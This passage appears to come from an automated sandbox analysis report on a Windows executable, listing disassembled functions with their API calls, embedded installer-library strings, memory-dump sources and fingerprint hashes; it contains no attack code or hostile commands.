                                                            • String ID: EngineForApplication.cpp$Failed to post apply message.
                                                            • API String ID: 2609174426-1304321051
                                                            • Opcode ID: b62d5a0e166c139b30d7a02e195556add905e04ad22e828195f7f37907809529
                                                            • Instruction ID: 63199743b5fe1a8a2720dba4e170bf75e16e7e92b53122172c194b8fbb50f52b
                                                            • Opcode Fuzzy Hash: b62d5a0e166c139b30d7a02e195556add905e04ad22e828195f7f37907809529
                                                            • Instruction Fuzzy Hash: 7FF0A733E5163567D621269A9C0DE8BBFD4FF04B70B024124FE18FA281D674DC0086D5
                                                            Function 0088EC5C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 0088EC71
                                                            • GetLastError.KERNEL32 ref: 0088EC7B
                                                            Strings
                                                            • Failed to post detect message., xrefs: 0088ECA9
                                                            • EngineForApplication.cpp, xrefs: 0088EC9F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagePostThread
                                                            • String ID: EngineForApplication.cpp$Failed to post detect message.
                                                            • API String ID: 2609174426-598219917
                                                            • Opcode ID: edbd3873e69e2c446b6904a910d3d2f57d0391b5e5547ff570d9a6836ca23ab7
                                                            • Instruction ID: 1527eb6089bf2e2cfffc7768eb1c90b3407e1f0511282a9bae4087961de7ef7a
                                                            • Opcode Fuzzy Hash: edbd3873e69e2c446b6904a910d3d2f57d0391b5e5547ff570d9a6836ca23ab7
                                                            • Instruction Fuzzy Hash: 35F02733A50231A7C630379AAC09F87BF94FF04B70B024024BD58FA280D670DC00C2D5
                                                            Function 008A6B76 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                            • Instruction ID: 64c081d1e6561ffe69e0c5ec15707118ab5f3ff21192737baef73575d8af8bfa
                                                            • Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                            • Instruction Fuzzy Hash: 85A16775A003869FFB21CF28C8817AEBBA1FF12350F2C416DE495DB685E2398961C751
                                                            Function 008B5EC5 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 163stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: dlutil.cpp
                                                            • API String ID: 1659193697-2067379296
                                                            • Opcode ID: 6fd913e03d4b2e3f067f0996625b216d84c0aca4c7d35e543d4acd481f8246f6
                                                            • Instruction ID: 48990e052d9e516e51cf30fb67e7fb44a70d8dba60f57265427d0c5987b622a1
                                                            • Opcode Fuzzy Hash: 6fd913e03d4b2e3f067f0996625b216d84c0aca4c7d35e543d4acd481f8246f6
                                                            • Instruction Fuzzy Hash: A651B172902A1AABDB119FA58C80AEFBBB9FF88710F154115F900F7350DB75DD118BA0
                                                            Function 008A922B Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,008A2444,00000000,00000000,008A3479,?,008A3479,?,00000001,008A2444,ECE85006,00000001,008A3479,008A3479), ref: 008A9278
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008A9301
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008A9313
                                                            • __freea.LIBCMT ref: 008A931C
                                                              • Part of subcall function 008A521A: HeapAlloc.KERNEL32(00000000,?,?,?,008A1F87,?,0000015D,?,?,?,?,008A33E0,000000FF,00000000,?,?), ref: 008A524C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 573072132-0
                                                            • Opcode ID: 3281866ced9487234b17f3cd43019169cf22a0efbc3efb11c892b4ffef9d6fd8
                                                            • Instruction ID: ecc01b7f0820c8906f2672b1db0261e3a58c8d6001573a6fcb2a8889a161d06a
                                                            • Opcode Fuzzy Hash: 3281866ced9487234b17f3cd43019169cf22a0efbc3efb11c892b4ffef9d6fd8
                                                            • Instruction Fuzzy Hash: A931B032A0420AABEF249F68CC85EAE7BB5FB41710F144228FC58D7291EB35DD51CB90
                                                            Function 00874FA4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00875552,?,?,?,?,?,?), ref: 00874FFE
                                                            • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,00875552,?,?,?,?,?,?), ref: 00875012
                                                            • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00875552,?,?), ref: 00875101
                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00875552,?,?), ref: 00875108
                                                              • Part of subcall function 00871161: LocalFree.KERNEL32(?,?,00874FBB,?,00000000,?,00875552,?,?,?,?,?,?), ref: 0087116B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                            • String ID:
                                                            • API String ID: 3671900028-0
                                                            • Opcode ID: f40a4685ae596c8d42e02ab60b067ea9cad3a7fdd9590bacb3110ccc2b74c522
                                                            • Instruction ID: d15c553eec70500bdaa447486a3c256e32fe34dcad80d8d6b49d1df949f4e980
                                                            • Opcode Fuzzy Hash: f40a4685ae596c8d42e02ab60b067ea9cad3a7fdd9590bacb3110ccc2b74c522
                                                            • Instruction Fuzzy Hash: 164108B1500B059BCA30EBB8C849BDB73ECFF05300F448929B6AED3155EB74E5458B62
                                                            Function 00874C86 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087F96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,00874CA5,?,?,00000001), ref: 0087F9BC
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00874D0C
                                                            Strings
                                                            • Unable to get resume command line from the registry, xrefs: 00874CAB
                                                            • Failed to get current process path., xrefs: 00874CCA
                                                            • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00874CF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close$Handle
                                                            • String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
                                                            • API String ID: 187904097-642631345
                                                            • Opcode ID: 51912dc4e3e8aba6ca1813fc113515527804257b1536af53188d9a90842133c1
                                                            • Instruction ID: 0c12dfee4abeb0c14292b67dbed301ccee547a6a59c83ce703cbeb5ae3a37ccf
                                                            • Opcode Fuzzy Hash: 51912dc4e3e8aba6ca1813fc113515527804257b1536af53188d9a90842133c1
                                                            • Instruction Fuzzy Hash: 32116A31D41518FA8F22AB99DC018EEBFB8FF50710B1081A6F814E2319EB71CA10EA81
                                                            Function 008A88B2 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008A8A56,00000000,00000000,?,008A8859,008A8A56,00000000,00000000,00000000,?,008A8A56,00000006,FlsSetValue), ref: 008A88E4
                                                            • GetLastError.KERNEL32(?,008A8859,008A8A56,00000000,00000000,00000000,?,008A8A56,00000006,FlsSetValue,008D2404,008D240C,00000000,00000364,?,008A6230), ref: 008A88F0
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008A8859,008A8A56,00000000,00000000,00000000,?,008A8A56,00000006,FlsSetValue,008D2404,008D240C,00000000), ref: 008A88FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 4b4584f3982febd0d78b2c1b05a1ebc2a9334d630bfba45aee88fd0fd7d8725e
                                                            • Instruction ID: 3c6643abb01d440345e12ef0ac5a5b633d7447dcd3577a6d3dcf7d3a93ff9843
                                                            • Opcode Fuzzy Hash: 4b4584f3982febd0d78b2c1b05a1ebc2a9334d630bfba45aee88fd0fd7d8725e
                                                            • Instruction Fuzzy Hash: 5701F732741226EBEB214B69DC44A7B7B98FF06BA1B140720F906E3640EF60DC0087F1
                                                            Function 008A615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000000,008A1AEC,00000000,80004004,?,008A1DF0,00000000,80004004,00000000,00000000), ref: 008A6162
                                                            • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 008A61CA
                                                            • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 008A61D6
                                                            • _abort.LIBCMT ref: 008A61DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_abort
                                                            • String ID:
                                                            • API String ID: 88804580-0
                                                            • Opcode ID: dc78b3378e66cdbe311b5de42cdacf2215151d52b0bae40098e7f822fa73afdd
                                                            • Instruction ID: dc2ac8ab560c21f968f33013b9e11c9ae89881e424495a85b8f6a47e99c0c659
                                                            • Opcode Fuzzy Hash: dc78b3378e66cdbe311b5de42cdacf2215151d52b0bae40098e7f822fa73afdd
                                                            • Instruction Fuzzy Hash: 5BF08136104E11E6E71233296C0AB2F3B59FBC3765B290225FA24D6A9AFF6488524126
                                                            Function 00877435 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00877441
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008774A8
                                                            Strings
                                                            • Failed to get value as numeric for variable: %ls, xrefs: 00877497
                                                            • Failed to get value of variable: %ls, xrefs: 0087747B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                            • API String ID: 3168844106-4270472870
                                                            • Opcode ID: b92762af3e8199b90ae4935e394b07495ff2c85ab5f7912fa6f2bb43a2312528
                                                            • Instruction ID: e4a245f3411cc3f6e07d1fc323b36da7260df7e6707568bd38ef766385125505
                                                            • Opcode Fuzzy Hash: b92762af3e8199b90ae4935e394b07495ff2c85ab5f7912fa6f2bb43a2312528
                                                            • Instruction Fuzzy Hash: C1014C36944229ABCF215E58CC05A9E7F64FF10721F15C161FC08EA221C376DE10EA99
                                                            Function 008775AA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 008775B6
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0087761D
                                                            Strings
                                                            • Failed to get value of variable: %ls, xrefs: 008775F0
                                                            • Failed to get value as version for variable: %ls, xrefs: 0087760C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                            • API String ID: 3168844106-1851729331
                                                            • Opcode ID: 3f49b5b6118081839ba17ba0fedc47c86a1f2b1dea1062ff404bc415235fc538
                                                            • Instruction ID: 8f98866162a31e92475de72507fbdc773f2dc36152942e6627bd8e194441f75b
                                                            • Opcode Fuzzy Hash: 3f49b5b6118081839ba17ba0fedc47c86a1f2b1dea1062ff404bc415235fc538
                                                            • Instruction Fuzzy Hash: C9015A32944529EBCF225F88CC09A9E3B68FF20725F008561FD08EA225D376DE10DBD5
                                                            Function 00877539 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,00879897,00000000,?,00000000,00000000,00000000,?,008796D6,00000000,?,00000000,00000000), ref: 00877545
                                                            • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,00879897,00000000,?,00000000,00000000,00000000,?,008796D6,00000000,?,00000000), ref: 0087759B
                                                            Strings
                                                            • Failed to copy value of variable: %ls, xrefs: 0087758A
                                                            • Failed to get value of variable: %ls, xrefs: 0087756B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                            • API String ID: 3168844106-2936390398
                                                            • Opcode ID: 4e34dc6c646cc3340f1337ac343f496b6d2c5df0f32fe675573b6b17b46496c2
                                                            • Instruction ID: 6c720942f8f1e76cf454366645ca23fddb31b1fcd304db3bfb62f53bdf564069
                                                            • Opcode Fuzzy Hash: 4e34dc6c646cc3340f1337ac343f496b6d2c5df0f32fe675573b6b17b46496c2
                                                            • Instruction Fuzzy Hash: 0DF01976944229BBCF126B98CC0999E7B68FF14761F048160FD18EA224C776DE209BD5
                                                            Function 0089E776 Relevance: 6.0, APIs: 4, Instructions: 26timethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0089E788
                                                            • GetCurrentThreadId.KERNEL32 ref: 0089E797
                                                            • GetCurrentProcessId.KERNEL32 ref: 0089E7A0
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0089E7AD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                            • String ID:
                                                            • API String ID: 2933794660-0
                                                            • Opcode ID: d4ce9929cc77a146d28d3e7878b06039827131084f1ca616ae37300cfa41afe6
                                                            • Instruction ID: 755f4f8970852b2d00f46c440599a88efc2c17bc885f5b966a24d3ac69894673
                                                            • Opcode Fuzzy Hash: d4ce9929cc77a146d28d3e7878b06039827131084f1ca616ae37300cfa41afe6
                                                            • Instruction Fuzzy Hash: E9F04D71C1020DEBCB00DBB4D949A9EBBF8FF18315F514995A415E7210E774AB049B61
                                                            Function 008B0C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008B0DD7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: regutil.cpp
                                                            • API String ID: 3535843008-955085611
                                                            • Opcode ID: f41a5a6c1f18aa656c3604e69ea95ab3256f9299862564363037f2010bd583c8
                                                            • Instruction ID: df79f7afc4ef956e2ea0cbd33b5a2177248b23159ad39f5d6d40e9d533008551
                                                            • Opcode Fuzzy Hash: f41a5a6c1f18aa656c3604e69ea95ab3256f9299862564363037f2010bd583c8
                                                            • Instruction Fuzzy Hash: C141BF32D0152AEBDB318AD8C8047EF7B61FB00760F298365B915EA3A0D734AD50AF91
                                                            Function 008B479B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 008B48FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                            • API String ID: 47109696-3023217399
                                                            • Opcode ID: 4ec14be6c6b63a49a9c1e23f04a6c4eb7078a8d7f857ddd8e1d68f741420e67d
                                                            • Instruction ID: 7876e9e4cd50b245f1b751b07227000e3515ffd33fbf9332406bbcde8ae66e38
                                                            • Opcode Fuzzy Hash: 4ec14be6c6b63a49a9c1e23f04a6c4eb7078a8d7f857ddd8e1d68f741420e67d
                                                            • Instruction Fuzzy Hash: EF416C75E00259ABCB20DF98C882AEEBBB5FB44B10F21507AE514EB312DB319E51DB50
                                                            Function 008B10B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008B112B
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008B1163
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID: regutil.cpp
                                                            • API String ID: 3660427363-955085611
                                                            • Opcode ID: 90f1c04a21bfbf16c1bb238887aef05fddbe2705fd235b005b419fe34808cb7b
                                                            • Instruction ID: e6c935cfd2f3d578ab8b5fe6d53c63c83ddfd1294cc89ba92c170d2f4f556bb6
                                                            • Opcode Fuzzy Hash: 90f1c04a21bfbf16c1bb238887aef05fddbe2705fd235b005b419fe34808cb7b
                                                            • Instruction Fuzzy Hash: 02418E72D0012AEBDF209F9C8C599EEBBB9FF10350F50816AEA14EB350D7319E119B90
                                                            Function 008A66D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(008BB518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 008A67A3
                                                            • GetLastError.KERNEL32 ref: 008A67BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ByteCharErrorLastMultiWide
                                                            • String ID: comres.dll
                                                            • API String ID: 203985260-246242247
                                                            • Opcode ID: a0b379e656579c745364bbeba50d312ac35f5685f1693eeaf3b87f71db7ec4f4
                                                            • Instruction ID: aaa83e41f1ce177335b53a72c141b0ea8db844104a2472918cd9d9e93c3ecf11
                                                            • Opcode Fuzzy Hash: a0b379e656579c745364bbeba50d312ac35f5685f1693eeaf3b87f71db7ec4f4
                                                            • Instruction Fuzzy Hash: 6D3107306102159BEB21AF58C885AAB7B68FF43768F1C0269F814C7995FB708D20C7A1
